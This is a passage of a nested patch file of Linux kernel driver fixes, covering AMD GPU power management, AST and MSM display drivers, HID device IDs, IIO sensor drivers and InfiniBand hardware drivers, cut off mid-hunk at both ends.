+ static int smu_v13_0_4_print_clk_levels(struct smu_context *smu,
+ 					enum smu_clk_type clk_type, char *buf)
+ {
+-	int i, size = 0, ret = 0;
++	int i, idx, size = 0, ret = 0;
+ 	uint32_t cur_value = 0, value = 0, count = 0;
+ 	uint32_t min, max;
+ 
+@@ -512,7 +512,8 @@ static int smu_v13_0_4_print_clk_levels(struct smu_context *smu,
+ 			break;
+ 
+ 		for (i = 0; i < count; i++) {
+-			ret = smu_v13_0_4_get_dpm_freq_by_index(smu, clk_type, i, &value);
++			idx = (clk_type == SMU_FCLK || clk_type == SMU_MCLK) ? (count - i - 1) : i;
++			ret = smu_v13_0_4_get_dpm_freq_by_index(smu, clk_type, idx, &value);
+ 			if (ret)
+ 				break;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_5_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_5_ppt.c
+index 66445964efbd1..0081fa607e02e 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_5_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_5_ppt.c
+@@ -866,7 +866,7 @@ out:
+ static int smu_v13_0_5_print_clk_levels(struct smu_context *smu,
+ 				enum smu_clk_type clk_type, char *buf)
+ {
+-	int i, size = 0, ret = 0;
++	int i, idx, size = 0, ret = 0;
+ 	uint32_t cur_value = 0, value = 0, count = 0;
+ 	uint32_t min = 0, max = 0;
+ 
+@@ -898,7 +898,8 @@ static int smu_v13_0_5_print_clk_levels(struct smu_context *smu,
+ 			goto print_clk_out;
+ 
+ 		for (i = 0; i < count; i++) {
+-			ret = smu_v13_0_5_get_dpm_freq_by_index(smu, clk_type, i, &value);
++			idx = (clk_type == SMU_MCLK) ? (count - i - 1) : i;
++			ret = smu_v13_0_5_get_dpm_freq_by_index(smu, clk_type, idx, &value);
+ 			if (ret)
+ 				goto print_clk_out;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/yellow_carp_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/yellow_carp_ppt.c
+index 04e56b0b3033e..798f36cfcebd3 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/yellow_carp_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/yellow_carp_ppt.c
+@@ -1000,7 +1000,7 @@ out:
+ static int yellow_carp_print_clk_levels(struct smu_context *smu,
+ 				enum smu_clk_type clk_type, char *buf)
+ {
+-	int i, size = 0, ret = 0;
++	int i, idx, size = 0, ret = 0;
+ 	uint32_t cur_value = 0, value = 0, count = 0;
+ 	uint32_t min, max;
+ 
+@@ -1033,7 +1033,8 @@ static int yellow_carp_print_clk_levels(struct smu_context *smu,
+ 			goto print_clk_out;
+ 
+ 		for (i = 0; i < count; i++) {
+-			ret = yellow_carp_get_dpm_freq_by_index(smu, clk_type, i, &value);
++			idx = (clk_type == SMU_FCLK || clk_type == SMU_MCLK) ? (count - i - 1) : i;
++			ret = yellow_carp_get_dpm_freq_by_index(smu, clk_type, idx, &value);
+ 			if (ret)
+ 				goto print_clk_out;
+ 
+diff --git a/drivers/gpu/drm/ast/ast_main.c b/drivers/gpu/drm/ast/ast_main.c
+index 067453266897f..5df527051177a 100644
+--- a/drivers/gpu/drm/ast/ast_main.c
++++ b/drivers/gpu/drm/ast/ast_main.c
+@@ -427,11 +427,12 @@ struct ast_private *ast_device_create(const struct drm_driver *drv,
+ 		return ERR_PTR(-EIO);
+ 
+ 	/*
+-	 * If we don't have IO space at all, use MMIO now and
+-	 * assume the chip has MMIO enabled by default (rev 0x20
+-	 * and higher).
++	 * After AST2500, MMIO is enabled by default, and it should be used
++	 * to stay compatible with Arm.
+ 	 */
+-	if (!(pci_resource_flags(pdev, 2) & IORESOURCE_IO)) {
++	if (pdev->revision >= 0x40) {
++		ast->ioregs = ast->regs + AST_IO_MM_OFFSET;
++	} else if (!(pci_resource_flags(pdev, 2) & IORESOURCE_IO)) {
+ 		drm_info(dev, "platform has no IO space, trying MMIO\n");
+ 		ast->ioregs = ast->regs + AST_IO_MM_OFFSET;
+ 	}
+diff --git a/drivers/gpu/drm/msm/msm_iommu.c b/drivers/gpu/drm/msm/msm_iommu.c
+index 5577cea7c0092..d12ba47b37c4f 100644
+--- a/drivers/gpu/drm/msm/msm_iommu.c
++++ b/drivers/gpu/drm/msm/msm_iommu.c
+@@ -227,7 +227,12 @@ struct msm_mmu *msm_iommu_pagetable_create(struct msm_mmu *parent)
+ 	/* Get the pagetable configuration from the domain */
+ 	if (adreno_smmu->cookie)
+ 		ttbr1_cfg = adreno_smmu->get_ttbr1_cfg(adreno_smmu->cookie);
+-	if (!ttbr1_cfg)
++
++	/*
++	 * If you hit this WARN_ONCE() you are probably missing an entry in
++	 * qcom_smmu_impl_of_match[] in arm-smmu-qcom.c
++	 */
++	if (WARN_ONCE(!ttbr1_cfg, "No per-process page tables"))
+ 		return ERR_PTR(-ENODEV);
+ 
+ 	/*
+diff --git a/drivers/hid/hid-google-hammer.c b/drivers/hid/hid-google-hammer.c
+index 7ae5f27df54dd..c6bdb9c4ef3e0 100644
+--- a/drivers/hid/hid-google-hammer.c
++++ b/drivers/hid/hid-google-hammer.c
+@@ -586,6 +586,8 @@ static const struct hid_device_id hammer_devices[] = {
+ 		     USB_VENDOR_ID_GOOGLE, USB_DEVICE_ID_GOOGLE_EEL) },
+ 	{ HID_DEVICE(BUS_USB, HID_GROUP_GENERIC,
+ 		     USB_VENDOR_ID_GOOGLE, USB_DEVICE_ID_GOOGLE_HAMMER) },
++	{ HID_DEVICE(BUS_USB, HID_GROUP_GENERIC,
++		     USB_VENDOR_ID_GOOGLE, USB_DEVICE_ID_GOOGLE_JEWEL) },
+ 	{ HID_DEVICE(BUS_USB, HID_GROUP_GENERIC,
+ 		     USB_VENDOR_ID_GOOGLE, USB_DEVICE_ID_GOOGLE_MAGNEMITE) },
+ 	{ HID_DEVICE(BUS_USB, HID_GROUP_GENERIC,
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 53c6692d77714..653db6cdab579 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -523,6 +523,7 @@
+ #define USB_DEVICE_ID_GOOGLE_MOONBALL	0x5044
+ #define USB_DEVICE_ID_GOOGLE_DON	0x5050
+ #define USB_DEVICE_ID_GOOGLE_EEL	0x5057
++#define USB_DEVICE_ID_GOOGLE_JEWEL	0x5061
+ 
+ #define USB_VENDOR_ID_GOTOP		0x08f2
+ #define USB_DEVICE_ID_SUPER_Q2		0x007f
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index d2f500242ed40..9c30dd30537af 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -826,7 +826,7 @@ static int wacom_intuos_inout(struct wacom_wac *wacom)
+ 	/* Enter report */
+ 	if ((data[1] & 0xfc) == 0xc0) {
+ 		/* serial number of the tool */
+-		wacom->serial[idx] = ((data[3] & 0x0f) << 28) +
++		wacom->serial[idx] = ((__u64)(data[3] & 0x0f) << 28) +
+ 			(data[4] << 20) + (data[5] << 12) +
+ 			(data[6] << 4) + (data[7] >> 4);
+ 
+diff --git a/drivers/hwmon/k10temp.c b/drivers/hwmon/k10temp.c
+index be8bbb1c3a02d..823d0ca1d6059 100644
+--- a/drivers/hwmon/k10temp.c
++++ b/drivers/hwmon/k10temp.c
+@@ -507,6 +507,7 @@ static const struct pci_device_id k10temp_id_table[] = {
+ 	{ PCI_VDEVICE(AMD, PCI_DEVICE_ID_AMD_19H_M50H_DF_F3) },
+ 	{ PCI_VDEVICE(AMD, PCI_DEVICE_ID_AMD_19H_M60H_DF_F3) },
+ 	{ PCI_VDEVICE(AMD, PCI_DEVICE_ID_AMD_19H_M70H_DF_F3) },
++	{ PCI_VDEVICE(AMD, PCI_DEVICE_ID_AMD_19H_M78H_DF_F3) },
+ 	{ PCI_VDEVICE(HYGON, PCI_DEVICE_ID_AMD_17H_DF_F3) },
+ 	{}
+ };
+diff --git a/drivers/iio/accel/st_accel_core.c b/drivers/iio/accel/st_accel_core.c
+index c8c8eb15c34e6..c4143c5678746 100644
+--- a/drivers/iio/accel/st_accel_core.c
++++ b/drivers/iio/accel/st_accel_core.c
+@@ -1289,12 +1289,12 @@ static int apply_acpi_orientation(struct iio_dev *indio_dev)
+ 
+ 	adev = ACPI_COMPANION(indio_dev->dev.parent);
+ 	if (!adev)
+-		return 0;
++		return -ENXIO;
+ 
+ 	/* Read _ONT data, which should be a package of 6 integers. */
+ 	status = acpi_evaluate_object(adev->handle, "_ONT", NULL, &buffer);
+ 	if (status == AE_NOT_FOUND) {
+-		return 0;
++		return -ENXIO;
+ 	} else if (ACPI_FAILURE(status)) {
+ 		dev_warn(&indio_dev->dev, "failed to execute _ONT: %d\n",
+ 			 status);
+diff --git a/drivers/iio/adc/ad7192.c b/drivers/iio/adc/ad7192.c
+index d71977be7d228..a8f6fa48daa8e 100644
+--- a/drivers/iio/adc/ad7192.c
++++ b/drivers/iio/adc/ad7192.c
+@@ -898,10 +898,6 @@ static const struct iio_info ad7195_info = {
+ 	__AD719x_CHANNEL(_si, _channel1, -1, _address, NULL, IIO_VOLTAGE, \
+ 		BIT(IIO_CHAN_INFO_SCALE), ad7192_calibsys_ext_info)
+ 
+-#define AD719x_SHORTED_CHANNEL(_si, _channel1, _address) \
+-	__AD719x_CHANNEL(_si, _channel1, -1, _address, "shorted", IIO_VOLTAGE, \
+-		BIT(IIO_CHAN_INFO_SCALE), ad7192_calibsys_ext_info)
+-
+ #define AD719x_TEMP_CHANNEL(_si, _address) \
+ 	__AD719x_CHANNEL(_si, 0, -1, _address, NULL, IIO_TEMP, 0, NULL)
+ 
+@@ -909,7 +905,7 @@ static const struct iio_chan_spec ad7192_channels[] = {
+ 	AD719x_DIFF_CHANNEL(0, 1, 2, AD7192_CH_AIN1P_AIN2M),
+ 	AD719x_DIFF_CHANNEL(1, 3, 4, AD7192_CH_AIN3P_AIN4M),
+ 	AD719x_TEMP_CHANNEL(2, AD7192_CH_TEMP),
+-	AD719x_SHORTED_CHANNEL(3, 2, AD7192_CH_AIN2P_AIN2M),
++	AD719x_DIFF_CHANNEL(3, 2, 2, AD7192_CH_AIN2P_AIN2M),
+ 	AD719x_CHANNEL(4, 1, AD7192_CH_AIN1),
+ 	AD719x_CHANNEL(5, 2, AD7192_CH_AIN2),
+ 	AD719x_CHANNEL(6, 3, AD7192_CH_AIN3),
+@@ -923,7 +919,7 @@ static const struct iio_chan_spec ad7193_channels[] = {
+ 	AD719x_DIFF_CHANNEL(2, 5, 6, AD7193_CH_AIN5P_AIN6M),
+ 	AD719x_DIFF_CHANNEL(3, 7, 8, AD7193_CH_AIN7P_AIN8M),
+ 	AD719x_TEMP_CHANNEL(4, AD7193_CH_TEMP),
+-	AD719x_SHORTED_CHANNEL(5, 2, AD7193_CH_AIN2P_AIN2M),
++	AD719x_DIFF_CHANNEL(5, 2, 2, AD7193_CH_AIN2P_AIN2M),
+ 	AD719x_CHANNEL(6, 1, AD7193_CH_AIN1),
+ 	AD719x_CHANNEL(7, 2, AD7193_CH_AIN2),
+ 	AD719x_CHANNEL(8, 3, AD7193_CH_AIN3),
+diff --git a/drivers/iio/adc/ad_sigma_delta.c b/drivers/iio/adc/ad_sigma_delta.c
+index d8570f620785a..7e21928707437 100644
+--- a/drivers/iio/adc/ad_sigma_delta.c
++++ b/drivers/iio/adc/ad_sigma_delta.c
+@@ -584,6 +584,10 @@ static int devm_ad_sd_probe_trigger(struct device *dev, struct iio_dev *indio_de
+ 	init_completion(&sigma_delta->completion);
+ 
+ 	sigma_delta->irq_dis = true;
++
++	/* the IRQ core clears IRQ_DISABLE_UNLAZY flag when freeing an IRQ */
++	irq_set_status_flags(sigma_delta->spi->irq, IRQ_DISABLE_UNLAZY);
++
+ 	ret = devm_request_irq(dev, sigma_delta->spi->irq,
+ 			       ad_sd_data_rdy_trig_poll,
+ 			       sigma_delta->info->irq_flags | IRQF_NO_AUTOEN,
+diff --git a/drivers/iio/adc/mxs-lradc-adc.c b/drivers/iio/adc/mxs-lradc-adc.c
+index bca79a93cbe43..a50f39143d3ea 100644
+--- a/drivers/iio/adc/mxs-lradc-adc.c
++++ b/drivers/iio/adc/mxs-lradc-adc.c
+@@ -757,13 +757,13 @@ static int mxs_lradc_adc_probe(struct platform_device *pdev)
+ 
+ 	ret = mxs_lradc_adc_trigger_init(iio);
+ 	if (ret)
+-		goto err_trig;
++		return ret;
+ 
+ 	ret = iio_triggered_buffer_setup(iio, &iio_pollfunc_store_time,
+ 					 &mxs_lradc_adc_trigger_handler,
+ 					 &mxs_lradc_adc_buffer_ops);
+ 	if (ret)
+-		return ret;
++		goto err_trig;
+ 
+ 	adc->vref_mv = mxs_lradc_adc_vref_mv[lradc->soc];
+ 
+@@ -801,9 +801,9 @@ static int mxs_lradc_adc_probe(struct platform_device *pdev)
+ 
+ err_dev:
+ 	mxs_lradc_adc_hw_stop(adc);
+-	mxs_lradc_adc_trigger_remove(iio);
+-err_trig:
+ 	iio_triggered_buffer_cleanup(iio);
++err_trig:
++	mxs_lradc_adc_trigger_remove(iio);
+ 	return ret;
+ }
+ 
+@@ -814,8 +814,8 @@ static int mxs_lradc_adc_remove(struct platform_device *pdev)
+ 
+ 	iio_device_unregister(iio);
+ 	mxs_lradc_adc_hw_stop(adc);
+-	mxs_lradc_adc_trigger_remove(iio);
+ 	iio_triggered_buffer_cleanup(iio);
++	mxs_lradc_adc_trigger_remove(iio);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/iio/adc/stm32-adc.c b/drivers/iio/adc/stm32-adc.c
+index 3cda529f081db..a5d5b7b3823bc 100644
+--- a/drivers/iio/adc/stm32-adc.c
++++ b/drivers/iio/adc/stm32-adc.c
+@@ -1882,16 +1882,15 @@ static int stm32_adc_get_legacy_chan_count(struct iio_dev *indio_dev, struct stm
+ 	 * to get the *real* number of channels.
+ 	 */
+ 	ret = device_property_count_u32(dev, "st,adc-diff-channels");
+-	if (ret < 0)
+-		return ret;
+-
+-	ret /= (int)(sizeof(struct stm32_adc_diff_channel) / sizeof(u32));
+-	if (ret > adc_info->max_channels) {
+-		dev_err(&indio_dev->dev, "Bad st,adc-diff-channels?\n");
+-		return -EINVAL;
+-	} else if (ret > 0) {
+-		adc->num_diff = ret;
+-		num_channels += ret;
++	if (ret > 0) {
++		ret /= (int)(sizeof(struct stm32_adc_diff_channel) / sizeof(u32));
++		if (ret > adc_info->max_channels) {
++			dev_err(&indio_dev->dev, "Bad st,adc-diff-channels?\n");
++			return -EINVAL;
++		} else if (ret > 0) {
++			adc->num_diff = ret;
++			num_channels += ret;
++		}
+ 	}
+ 
+ 	/* Optional sample time is provided either for each, or all channels */
+@@ -1913,6 +1912,7 @@ static int stm32_adc_legacy_chan_init(struct iio_dev *indio_dev,
+ 	struct stm32_adc_diff_channel diff[STM32_ADC_CH_MAX];
+ 	struct device *dev = &indio_dev->dev;
+ 	u32 num_diff = adc->num_diff;
++	int num_se = nchans - num_diff;
+ 	int size = num_diff * sizeof(*diff) / sizeof(u32);
+ 	int scan_index = 0, ret, i, c;
+ 	u32 smp = 0, smps[STM32_ADC_CH_MAX], chans[STM32_ADC_CH_MAX];
+@@ -1939,29 +1939,32 @@ static int stm32_adc_legacy_chan_init(struct iio_dev *indio_dev,
+ 			scan_index++;
+ 		}
+ 	}
+-
+-	ret = device_property_read_u32_array(dev, "st,adc-channels", chans,
+-					     nchans);
+-	if (ret)
+-		return ret;
+-
+-	for (c = 0; c < nchans; c++) {
+-		if (chans[c] >= adc_info->max_channels) {
+-			dev_err(&indio_dev->dev, "Invalid channel %d\n",
+-				chans[c]);
+-			return -EINVAL;
++	if (num_se > 0) {
++		ret = device_property_read_u32_array(dev, "st,adc-channels", chans, num_se);
++		if (ret) {
++			dev_err(&indio_dev->dev, "Failed to get st,adc-channels %d\n", ret);
++			return ret;
+ 		}
+ 
+-		/* Channel can't be configured both as single-ended & diff */
+-		for (i = 0; i < num_diff; i++) {
+-			if (chans[c] == diff[i].vinp) {
+-				dev_err(&indio_dev->dev, "channel %d misconfigured\n",	chans[c]);
++		for (c = 0; c < num_se; c++) {
++			if (chans[c] >= adc_info->max_channels) {
++				dev_err(&indio_dev->dev, "Invalid channel %d\n",
++					chans[c]);
+ 				return -EINVAL;
+ 			}
++
++			/* Channel can't be configured both as single-ended & diff */
++			for (i = 0; i < num_diff; i++) {
++				if (chans[c] == diff[i].vinp) {
++					dev_err(&indio_dev->dev, "channel %d misconfigured\n",
++						chans[c]);
++					return -EINVAL;
++				}
++			}
++			stm32_adc_chan_init_one(indio_dev, &channels[scan_index],
++						chans[c], 0, scan_index, false);
++			scan_index++;
+ 		}
+-		stm32_adc_chan_init_one(indio_dev, &channels[scan_index],
+-					chans[c], 0, scan_index, false);
+-		scan_index++;
+ 	}
+ 
+ 	if (adc->nsmps > 0) {
+@@ -2153,7 +2156,7 @@ static int stm32_adc_chan_fw_init(struct iio_dev *indio_dev, bool timestamping)
+ 
+ 	if (legacy)
+ 		ret = stm32_adc_legacy_chan_init(indio_dev, adc, channels,
+-						 num_channels);
++						 timestamping ? num_channels - 1 : num_channels);
+ 	else
+ 		ret = stm32_adc_generic_chan_init(indio_dev, adc, channels);
+ 	if (ret < 0)
+diff --git a/drivers/iio/addac/ad74413r.c b/drivers/iio/addac/ad74413r.c
+index e0e130ba9d3ec..05faf3910bfc6 100644
+--- a/drivers/iio/addac/ad74413r.c
++++ b/drivers/iio/addac/ad74413r.c
+@@ -973,7 +973,7 @@ static int ad74413r_read_raw(struct iio_dev *indio_dev,
+ 
+ 		ret = ad74413r_get_single_adc_result(indio_dev, chan->channel,
+ 						     val);
+-		if (ret)
++		if (ret < 0)
+ 			return ret;
+ 
+ 		ad74413r_adc_to_resistance_result(*val, val);
+diff --git a/drivers/iio/dac/Makefile b/drivers/iio/dac/Makefile
+index ec3e42713f000..e22d9b4bac807 100644
+--- a/drivers/iio/dac/Makefile
++++ b/drivers/iio/dac/Makefile
+@@ -17,7 +17,7 @@ obj-$(CONFIG_AD5592R_BASE) += ad5592r-base.o
+ obj-$(CONFIG_AD5592R) += ad5592r.o
+ obj-$(CONFIG_AD5593R) += ad5593r.o
+ obj-$(CONFIG_AD5755) += ad5755.o
+-obj-$(CONFIG_AD5755) += ad5758.o
++obj-$(CONFIG_AD5758) += ad5758.o
+ obj-$(CONFIG_AD5761) += ad5761.o
+ obj-$(CONFIG_AD5764) += ad5764.o
+ obj-$(CONFIG_AD5766) += ad5766.o
+diff --git a/drivers/iio/dac/mcp4725.c b/drivers/iio/dac/mcp4725.c
+index 446d1a8fe4bef..2be821d561c49 100644
+--- a/drivers/iio/dac/mcp4725.c
++++ b/drivers/iio/dac/mcp4725.c
+@@ -47,12 +47,18 @@ static int mcp4725_suspend(struct device *dev)
+ 	struct mcp4725_data *data = iio_priv(i2c_get_clientdata(
+ 		to_i2c_client(dev)));
+ 	u8 outbuf[2];
++	int ret;
+ 
+ 	outbuf[0] = (data->powerdown_mode + 1) << 4;
+ 	outbuf[1] = 0;
+ 	data->powerdown = true;
+ 
+-	return i2c_master_send(data->client, outbuf, 2);
++	ret = i2c_master_send(data->client, outbuf, 2);
++	if (ret < 0)
++		return ret;
++	else if (ret != 2)
++		return -EIO;
++	return 0;
+ }
+ 
+ static int mcp4725_resume(struct device *dev)
+@@ -60,13 +66,19 @@ static int mcp4725_resume(struct device *dev)
+ 	struct mcp4725_data *data = iio_priv(i2c_get_clientdata(
+ 		to_i2c_client(dev)));
+ 	u8 outbuf[2];
++	int ret;
+ 
+ 	/* restore previous DAC value */
+ 	outbuf[0] = (data->dac_value >> 8) & 0xf;
+ 	outbuf[1] = data->dac_value & 0xff;
+ 	data->powerdown = false;
+ 
+-	return i2c_master_send(data->client, outbuf, 2);
++	ret = i2c_master_send(data->client, outbuf, 2);
++	if (ret < 0)
++		return ret;
++	else if (ret != 2)
++		return -EIO;
++	return 0;
+ }
+ static DEFINE_SIMPLE_DEV_PM_OPS(mcp4725_pm_ops, mcp4725_suspend,
+ 				mcp4725_resume);
+diff --git a/drivers/iio/imu/inv_icm42600/inv_icm42600_buffer.c b/drivers/iio/imu/inv_icm42600/inv_icm42600_buffer.c
+index 99576b2c171f4..32d7f83642303 100644
+--- a/drivers/iio/imu/inv_icm42600/inv_icm42600_buffer.c
++++ b/drivers/iio/imu/inv_icm42600/inv_icm42600_buffer.c
+@@ -275,9 +275,14 @@ static int inv_icm42600_buffer_preenable(struct iio_dev *indio_dev)
+ {
+ 	struct inv_icm42600_state *st = iio_device_get_drvdata(indio_dev);
+ 	struct device *dev = regmap_get_device(st->map);
++	struct inv_icm42600_timestamp *ts = iio_priv(indio_dev);
+ 
+ 	pm_runtime_get_sync(dev);
+ 
++	mutex_lock(&st->lock);
++	inv_icm42600_timestamp_reset(ts);
++	mutex_unlock(&st->lock);
++
+ 	return 0;
+ }
+ 
+@@ -375,7 +380,6 @@ static int inv_icm42600_buffer_postdisable(struct iio_dev *indio_dev)
+ 	struct device *dev = regmap_get_device(st->map);
+ 	unsigned int sensor;
+ 	unsigned int *watermark;
+-	struct inv_icm42600_timestamp *ts;
+ 	struct inv_icm42600_sensor_conf conf = INV_ICM42600_SENSOR_CONF_INIT;
+ 	unsigned int sleep_temp = 0;
+ 	unsigned int sleep_sensor = 0;
+@@ -385,11 +389,9 @@ static int inv_icm42600_buffer_postdisable(struct iio_dev *indio_dev)
+ 	if (indio_dev == st->indio_gyro) {
+ 		sensor = INV_ICM42600_SENSOR_GYRO;
+ 		watermark = &st->fifo.watermark.gyro;
+-		ts = iio_priv(st->indio_gyro);
+ 	} else if (indio_dev == st->indio_accel) {
+ 		sensor = INV_ICM42600_SENSOR_ACCEL;
+ 		watermark = &st->fifo.watermark.accel;
+-		ts = iio_priv(st->indio_accel);
+ 	} else {
+ 		return -EINVAL;
+ 	}
+@@ -417,8 +419,6 @@ static int inv_icm42600_buffer_postdisable(struct iio_dev *indio_dev)
+ 	if (!st->fifo.on)
+ 		ret = inv_icm42600_set_temp_conf(st, false, &sleep_temp);
+ 
+-	inv_icm42600_timestamp_reset(ts);
+-
+ out_unlock:
+ 	mutex_unlock(&st->lock);
+ 
+diff --git a/drivers/iio/light/vcnl4035.c b/drivers/iio/light/vcnl4035.c
+index 3ed37f6057fbf..a23c415fcb7aa 100644
+--- a/drivers/iio/light/vcnl4035.c
++++ b/drivers/iio/light/vcnl4035.c
+@@ -8,6 +8,7 @@
+  * TODO: Proximity
+  */
+ #include <linux/bitops.h>
++#include <linux/bitfield.h>
+ #include <linux/i2c.h>
+ #include <linux/module.h>
+ #include <linux/pm_runtime.h>
+@@ -42,6 +43,7 @@
+ #define VCNL4035_ALS_PERS_MASK		GENMASK(3, 2)
+ #define VCNL4035_INT_ALS_IF_H_MASK	BIT(12)
+ #define VCNL4035_INT_ALS_IF_L_MASK	BIT(13)
++#define VCNL4035_DEV_ID_MASK		GENMASK(7, 0)
+ 
+ /* Default values */
+ #define VCNL4035_MODE_ALS_ENABLE	BIT(0)
+@@ -413,6 +415,7 @@ static int vcnl4035_init(struct vcnl4035_data *data)
+ 		return ret;
+ 	}
+ 
++	id = FIELD_GET(VCNL4035_DEV_ID_MASK, id);
+ 	if (id != VCNL4035_DEV_ID_VAL) {
+ 		dev_err(&data->client->dev, "Wrong id, got %x, expected %x\n",
+ 			id, VCNL4035_DEV_ID_VAL);
+diff --git a/drivers/infiniband/hw/bnxt_re/ib_verbs.c b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+index 989edc7896338..94222de1d3719 100644
+--- a/drivers/infiniband/hw/bnxt_re/ib_verbs.c
++++ b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+@@ -3241,9 +3241,7 @@ static int bnxt_re_process_raw_qp_pkt_rx(struct bnxt_re_qp *gsi_qp,
+ 	udwr.remote_qkey = gsi_sqp->qplib_qp.qkey;
+ 
+ 	/* post data received  in the send queue */
+-	rc = bnxt_re_post_send_shadow_qp(rdev, gsi_sqp, swr);
+-
+-	return 0;
++	return bnxt_re_post_send_shadow_qp(rdev, gsi_sqp, swr);
+ }
+ 
+ static void bnxt_re_process_res_rawqp1_wc(struct ib_wc *wc,
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_fp.c b/drivers/infiniband/hw/bnxt_re/qplib_fp.c
+index 96e581ced50e2..ab2cc1c67f70b 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_fp.c
++++ b/drivers/infiniband/hw/bnxt_re/qplib_fp.c
+@@ -2043,6 +2043,12 @@ int bnxt_qplib_create_cq(struct bnxt_qplib_res *res, struct bnxt_qplib_cq *cq)
+ 	u32 pg_sz_lvl;
+ 	int rc;
+ 
++	if (!cq->dpi) {
++		dev_err(&rcfw->pdev->dev,
++			"FP: CREATE_CQ failed due to NULL DPI\n");
++		return -EINVAL;
++	}
++
+ 	hwq_attr.res = res;
+ 	hwq_attr.depth = cq->max_wqe;
+ 	hwq_attr.stride = sizeof(struct cq_base);
+@@ -2054,11 +2060,6 @@ int bnxt_qplib_create_cq(struct bnxt_qplib_res *res, struct bnxt_qplib_cq *cq)
+ 
+ 	RCFW_CMD_PREP(req, CREATE_CQ, cmd_flags);
+ 
+-	if (!cq->dpi) {
+-		dev_err(&rcfw->pdev->dev,
+-			"FP: CREATE_CQ failed due to NULL DPI\n");
+-		return -EINVAL;
+-	}
+ 	req.dpi = cpu_to_le32(cq->dpi->dpi);
+ 	req.cq_handle = cpu_to_le64(cq->cq_handle);
+ 	req.cq_size = cpu_to_le32(cq->hwq.max_elements);
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_res.c b/drivers/infiniband/hw/bnxt_re/qplib_res.c
+index 126d4f26f75ad..81b0c5e879f9e 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_res.c
++++ b/drivers/infiniband/hw/bnxt_re/qplib_res.c
+@@ -215,17 +215,9 @@ int bnxt_qplib_alloc_init_hwq(struct bnxt_qplib_hwq *hwq,
+ 			return -EINVAL;
+ 		hwq_attr->sginfo->npages = npages;
+ 	} else {
+-		unsigned long sginfo_num_pages = ib_umem_num_dma_blocks(
+-			hwq_attr->sginfo->umem, hwq_attr->sginfo->pgsize);
+-
++		npages = ib_umem_num_dma_blocks(hwq_attr->sginfo->umem,
++						hwq_attr->sginfo->pgsize);
+ 		hwq->is_user = true;
+-		npages = sginfo_num_pages;
+-		npages = (npages * PAGE_SIZE) /
+-			  BIT_ULL(hwq_attr->sginfo->pgshft);
+-		if ((sginfo_num_pages * PAGE_SIZE) %
+-		     BIT_ULL(hwq_attr->sginfo->pgshft))
+-			if (!npages)
+-				npages++;
+ 	}
+ 
+ 	if (npages == MAX_PBL_LVL_0_PGS && !hwq_attr->sginfo->nopte) {
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_sp.c b/drivers/infiniband/hw/bnxt_re/qplib_sp.c
+index b802981b71716..bae7d89261439 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_sp.c
++++ b/drivers/infiniband/hw/bnxt_re/qplib_sp.c
+@@ -584,16 +584,15 @@ int bnxt_qplib_reg_mr(struct bnxt_qplib_res *res, struct bnxt_qplib_mrw *mr,
+ 		/* Free the hwq if it already exist, must be a rereg */
+ 		if (mr->hwq.max_elements)
+ 			bnxt_qplib_free_hwq(res, &mr->hwq);
+-		/* Use system PAGE_SIZE */
+ 		hwq_attr.res = res;
+ 		hwq_attr.depth = pages;
+-		hwq_attr.stride = buf_pg_size;
++		hwq_attr.stride = sizeof(dma_addr_t);
+ 		hwq_attr.type = HWQ_TYPE_MR;
+ 		hwq_attr.sginfo = &sginfo;
+ 		hwq_attr.sginfo->umem = umem;
+ 		hwq_attr.sginfo->npages = pages;
+-		hwq_attr.sginfo->pgsize = PAGE_SIZE;
+-		hwq_attr.sginfo->pgshft = PAGE_SHIFT;
++		hwq_attr.sginfo->pgsize = buf_pg_size;
++		hwq_attr.sginfo->pgshft = ilog2(buf_pg_size);
+ 		rc = bnxt_qplib_alloc_init_hwq(&mr->hwq, &hwq_attr);
+ 		if (rc) {
+ 			dev_err(&res->pdev->dev,
+diff --git a/drivers/infiniband/hw/efa/efa_verbs.c b/drivers/infiniband/hw/efa/efa_verbs.c
+index 31454643f8c54..f9526a4c75b26 100644
+--- a/drivers/infiniband/hw/efa/efa_verbs.c
++++ b/drivers/infiniband/hw/efa/efa_verbs.c
+@@ -1397,7 +1397,7 @@ static int pbl_continuous_initialize(struct efa_dev *dev,
+  */
+ static int pbl_indirect_initialize(struct efa_dev *dev, struct pbl_context *pbl)
+ {
+-	u32 size_in_pages = DIV_ROUND_UP(pbl->pbl_buf_size_in_bytes, PAGE_SIZE);
++	u32 size_in_pages = DIV_ROUND_UP(pbl->pbl_buf_size_in_bytes, EFA_CHUNK_PAYLOAD_SIZE);
+ 	struct scatterlist *sgl;
+ 	int sg_dma_cnt, err;
+ 
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index b2421883993b1..34a270b6891a9 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -4728,11 +4728,9 @@ static int modify_qp_init_to_rtr(struct ib_qp *ibqp,
+ 	mtu = ib_mtu_enum_to_int(ib_mtu);
+ 	if (WARN_ON(mtu <= 0))
+ 		return -EINVAL;
+-#define MAX_LP_MSG_LEN 16384
